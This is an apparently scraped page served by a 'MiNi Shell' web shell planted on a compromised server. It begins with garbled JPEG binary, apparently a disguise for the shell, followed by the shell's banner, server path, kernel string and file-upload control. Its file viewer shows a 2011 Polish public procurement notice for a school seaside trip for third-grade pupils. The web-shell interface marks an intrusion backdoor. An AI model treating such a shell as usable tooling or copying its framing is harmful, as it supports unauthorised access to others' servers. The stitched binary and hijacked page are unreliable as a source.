JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110209/18768-N-2011.html

<p class="kh_header"><b>Dąbrowa Górnicza: Zorganizowanie wyjazdu śródrocznego tzw. zielonej szkoły dla uczniów klas trzecich szkoły podstawowej</b><br>
<b>Numer ogłoszenia: 18768 - 2011; data zamieszczenia: 09.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 7 w Dąbrowie Górniczej , ul. Jaworowa 6, 41-310 Dąbrowa Górnicza, woj. śląskie, tel. 0-32 2624042, faks 0-32 2624042.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsnr7dg.tvtom.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zsnr7dg.tvtom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wyjazdu śródrocznego tzw. zielonej szkoły dla uczniów klas trzecich szkoły podstawowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie wyjazdu śródrocznego tzw. zielonej szkoły dla uczniów klas trzecich szkoły podstawowej - zgodnie z kalkulacją cenową zawartą w załączniku nr 2, wymogami niniejszej specyfikacji oraz z uwzględnieniem postanowień projektu umowy.

3.2. Wspólny Słownik Zamówień:
55. 24. 00. 00 - 4 - Usługi w zakresie ośrodków i domów wypoczynkowych
63. 51. 10. 00 - 4 - Organizacja wycieczek

3.3. Szczegółowy opis przedmiotu zamówienia
Ilość uczestników
Przewidywana ilość uczestników - 78 osób płatnych (liczba uczestników może ulec zmianie) + 1 opiekun bezpłatnie na max 15 dzieci + 1 kierownik kolonii bezpłatnie (bez grupy).
Wartość umowy zostanie określona na podstawie rzeczywistej liczby uczestników, która będzie pochodną zgłoszeń złożonych przez rodziców.
Czas trwania zadania 
Termin realizacji usługi:  maj 2011r. do13 czerwca 2011r.
Długość trwania wypoczynku to 15 dni (łącznie z dniem wyjazdu i przyjazdu) w tym 14 noclegów w miesiącach maj-czerwiec 2011r. 


Miejscowość
	położona nad otwartym morzem o atrakcjach turystycznych 
	niewielka miejscowość nad morska na środkowym lub wschodnim wybrzeżu (wykluczone miasta)
	czysta ekologicznie okolica (wyklucza się oferty miejscowości skażonych, ujętych na liście największych trucicieli kraju lub usytuowanych w odległości mniejszej niż 70 km od tych miejscowości)
	korzystny klimat.

Obiekt
	usytuowany blisko otwartego morza, dojście do plaży nie dalej niż 100 m do 10 m.
	pokoje 2, 3 i 4 osobowe (zakwaterowanie wszystkich uczestników w jednym budynku o niskiej zabudowie, wykluczone budynki z ciągiem komunikacyjnym typu galeria)
	bardzo dobry stan techniczny obiektu, maksymalnie trzy kondygnacje: parter, I, 	pokoje z balkonami wyposażone w pełny węzeł sanitarny - w każdym pokoju wc, natrysk z ciepłą wodą i pościel
	wyposażenie pokoi w estetyczne meble 
	wykluczone piętrowe łóżka
	wykluczone pokoje typu studio
	pokoje dzieci bez wyposażenia w sprzęt TV
	osobne pokoje dla kadry i kierownika kolonii (preferowane pokoje 1- osobowe) wyposażone w pełny węzeł sanitarny (WC, natrysk z ciepłą wodą i pościel) i w sprzęt RTV
	sprzątanie pokoi, co najmniej, co dwa dni (odkurzanie lub mycie podłogi, porządkowanie łazienek i wc, wymiana pościeli w razie potrzeby)
	stołówka na terenie ośrodka estetyczna i zadbana (dopuszcza się usytuowanie stołówki na terenie obiektu, pod warunkiem, że obiektu nie dzieli ulica miejska)
	teren ośrodka: duży, ogrodzony, bezpieczny, oświetlony i strzeżony
	plac zabaw, zespół boisk sportowych na terenie ośrodka (boisko do siatkówki plażowej, stoły do pin-ponga)
	sala dyskotekowa ze sprzętem nagłaśniającym, miejsce na grill i ognisko na terenie ośrodka
	świetlica RTV, CD, DVD, wideo (zapewnienie filmów wideo dla dzieci)
	zaopatrzenie w sale dydaktyczne wyposażone w tablice kredowe i kredę lub typu klipart z zapewnieniem papieru, itp. w miejscu zakwaterowania
	budynek ogrzewany całorocznie, ogrzewanie włączane w miarę potrzeb na wniosek kierownika kolonii

Transport
	przewozu dzieci do miejsca wypoczynku i odwozu po jego zakończeniu odbędzie się w godzinach dziennych, autokarami wysokiej klasy LUX (wc, video, klimatyzacja), które muszą być dopuszczone do ruchu drogowego, posiadać aktualne badania techniczne, aktualne ubezpieczenie OC i NW oraz Protokół z kontroli autokaru wystawiony w dniach ich użytkowania do przewozu uczniów zgodnie z obowiązującymi przepisami
	bezpłatny przejazd dla: jednego opiekuna na każdych rozpoczynających się piętnastu uczniów + kierownik kolonii bez grupy
	autokar ma być podstawiony minimum pół godziny przed odjazdem uczniów w celu sprawdzenia jego sprawności technicznej i innych wymogów Zamawiającego
	w przypadku awarii autokaru Wykonawca zapewnia autokar zastępczy na własny koszt
	obsługa jednego autokaru przez dwóch kierowców 
	poniesienia wszelkich kosztów związanych z realizacją usługi transportu (w szczególności koszty parkingów, płatnych przejazdów, koszty delegacji kierowcy, koszty postojów, koszty noclegu i wyżywienia kierowców itp.)

Ubezpieczenie uczestników od następstw nieszczęśliwych wypadków
	przedmiotem ubezpieczenia są następstwa nieszczęśliwych wypadków doznanych przez uczestników zielonej szkoły; zakres czasowy: 24h na dobę, w okresie podanym w pkt. 3.3.
	świadczenia wypłacane będą w kraju i wyłącznie w złotych 
	wariant ubezpieczenia BEZKOMISYJNY
	Zakres ubezpieczenia: śmierć w następstwie NW, trwały uszczerbek na zdrowiu, zakres rozszerzony o zawał serca i udar mózgu
	 polisa NNW zostanie wystawiona w formie grupowego ubezpieczenia wraz z wykazem ubezpieczonych osób
	Wykonawca zobowiązany jest przedłożyć polisę, na co najmniej 14 dni przed terminem rozpoczęcia zielonej szkoły

Opieka medyczna
	pielęgniarka 24 h na dobę na terenie ośrodka, lekarz dochodzący na każde wezwanie pielęgniarki lub nauczyciela 
	izolatka dla dzieci chorych (opieka nad chorym dzieckiem w izolatce, podawanie leków, wyjazd z dzieckiem do lekarza specjalisty)
	zapewnienie podstawowych leków pierwszej potrzeby w ramach kosztów
	realizacja recept przez pielęgniarkę w przypadku choroby dziecka
	sprawna opieka w przypadku choroby lub wypadku dziecka 
	zapewnienie sprawnego, bezpłatnego transportu chorego lub poszkodowanego dziecka do i z przychodni pediatrycznej lub specjalistycznej pod opieką pielęgniarki i opiekuna wyznaczonego przez kierownika kolonii.
	przychodnia pediatryczna w odległości nie więcej niż 30 km i szpital w odległości nie więcej niż 60 km

Program kulturalno - sportowy
	organizacja dyskotek min. - dwóch, zapewnienie sprzętu nagłaśniającego, osoby prowadzącej i sali.
	organizacja ognisk z zapewnieniem pieczywa i kiełbasek - min. dwóch (poza planowanym posiłkiem)
	organizacja prelekcji ekologiczno - regionalnych przybliżających dzieciom region, w którym przebywają
	organizacja imprez regionalnych, z uwzględnieniem imprez plażowych (np. piesze wycieczki do latarni morskiej, poszukiwanie skarbów morskich neptunalia, wieczór piracki itp.)
	zapewnienie sprzętu sportowo-rekreacyjnego tj. piłek: nożnej, siatkowej, koszykowej, rakietki do badmintona, skakanki, w miarę możliwości stół do ping-ponga z rakietkami, gry świetlicowe (szachy, warcaby, inne gry planszowe), siatka z kompletem piłek oraz plażowego - parawanów i koców dla wszystkich uczestników
	zorganizowanie dwóch całodniowych wycieczek autokarowych turystyczno-krajoznawczych po okolicy, z przewodnikiem - zwiedzanie ciekawych miejsc i obiektów zabytkowych z pokryciem kosztów wstępu dla wszystkich uczestników, do co najmniej dwóch obiektów kulturalnych lub krajobrazowych na trasie ogólnej nie krótszej niż 50 km
        organizacja zawodów sportowych,
	zorganizowanie i opłacenie przez Wykonawcę rejsu statkiem dla wszystkich uczestników - dużą jednostką pływającą - rejs odbywać ma cała grupa jednocześnie

Wyżywienie
	cztery porcjowane, urozmaicone (duża ilość warzyw i owoców) o wysokich wartościach odżywczych posiłki dziennie: śniadanie, obiad, podwieczorek, kolacja. Posiłki będą przygotowywane zgodnie z zasadami określonymi w ustawie o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. Nr 171 poz. 1225) łącznie z przepisami wykonawczymi do tej ustawy.
	suchy prowiant na wycieczki całodniowe oraz na podróż powrotną (kanapki, soki, owoce, słodka bułka, wafel itp. oraz wodę mineralna niegazowaną w butelkach max.0,5 litra)
	Wykonawca zapewni uczestnikom, obiad podany w porze kolacji w dniu całodniowej wycieczki
	dostępność napojów, herbaty lub kompotu w ciągu dnia w miejscu dostępnym dla dzieci np. jadalnia oraz pieczywa z masłem i dżemem
	cała grupa na jednej zmianie żywieniowej
	w dniu przyjazdu obiadokolacja, przed odjazdem śniadanie

W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązuje się do:
	zapewnienia bezpłatnego pobytu i przejazdu dla: jednego opiekuna na każdych rozpoczynających się piętnastu uczniów + kierownik kolonii bez grupy
	zapewnienia pomocy dzieciom w przenoszeniu bagaży z autokaru do budynku po przyjeździe do ośrodka, oraz załadunku bagaży w drodze powrotnej
	opieka rezydenta przez cały okres trwania turnusu
	całodobowa obsługa ośrodka umożliwiająca całodobowy dostęp do telefonu oraz udzielenie pomocy w sytuacjach losowych
	umożliwienie uczestnikom kolonii korzystania z kocy, leżaków i parawanów na plaży
	pomniejszenie kosztów pobytu uczestnika o niewykorzystane dni pobytowe wynikające z konieczności skrócenia pobytu dziecka na kolonii (np. choroba dziecka lub sytuacja losowa uniemożliwiająca korzystanie z wypoczynku)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4, 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 09.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">9.3.1. Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
9.3.2. Charakterystykę obiektu, z podaniem jego adresu, nazwy, nazwy (firmy) lub imienia i nazwiska jego właściciela, zarządcy lub użytkownika nim dysponującego wraz z fotografiami lub folderem obiektu. 
9.3.3. Kopię wydanej właścicielowi, zarządcy lub użytkownikowi obiektu opinii właściwej miejscowo komendy powiatowej (miejskiej) Państwowej Straży Pożarnej lub protokołu okresowej (aktualnej) kontroli Państwowej Straży Pożarnej, o której mowa w § 4 ust.1pkt.2 rozporządzenia Ministra Gospodarki i Pracy z dnia 19.08.2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz.U. z 2006 r., Nr 22, poz.169)
9.3.4. Kopię wydanego właścicielowi, zarządcy lub użytkownikowi obiektu protokołu - ostatniej - okresowej kontroli właściwego miejscowo Państwowego Powiatowego Inspektora Sanitarnego zgodnie z obowiązującymi przepisami.
9.3.5. Zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku, gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b Ustawy.
9.3.6 Pełnomocnictwo do reprezentowania:
1)  wymagane w przypadku gdy Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których   uprawnienie do reprezentowania nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
2)  wymagane w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Wysokość stawki żywieniowejbrutto (WSZ) WSAD DO KOTŁA - 20</li>
<li>3 - Dodatkowa atrakcyjność obiektu i programu kulturalno-sportowego (DA) - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień niniejszej umowy w oparciu o art. 144 ust. ustawy o zamówieniach publicznych w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w sytuacji wystąpienia: 
25.4.1. w zakresie zmiany terminów realizacji zamówienia  na skutek: 
25.4.1. 1.siły wyższej, co oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
25.4.1.2. wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających prowadzenie zamówień np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
25.4.1. 3.Wystąpienia masowych zachorowań wśród uczniów, powodujące niemożliwość ich uczestniczenia w wyjeździe we wskazanym terminie.
25.4.2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności: 
25.4.2.1.  zakresie zmiany zadeklarowanej ilości uczestników tzw. zielonej szkoły w związku z różnicą liczby zgłoszeń - powstałą pomiędzy ilością zgłoszeń złożonych przez rodziców w dniu podpisania umowy, a liczbą faktycznych (zgłoszeń) i wpłat rodziców na 7 dni przed wyjazdem lub rezygnacji uczestników z udziału w wyjeździe z uzasadnionych przyczyn w późniejszym terminie.
25.4.3. Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
25.4.4.Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsnr7dg.tvtom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zsnr7dg.tvtom.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2011 godzina 09:00, miejsce: Sekretariat Szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com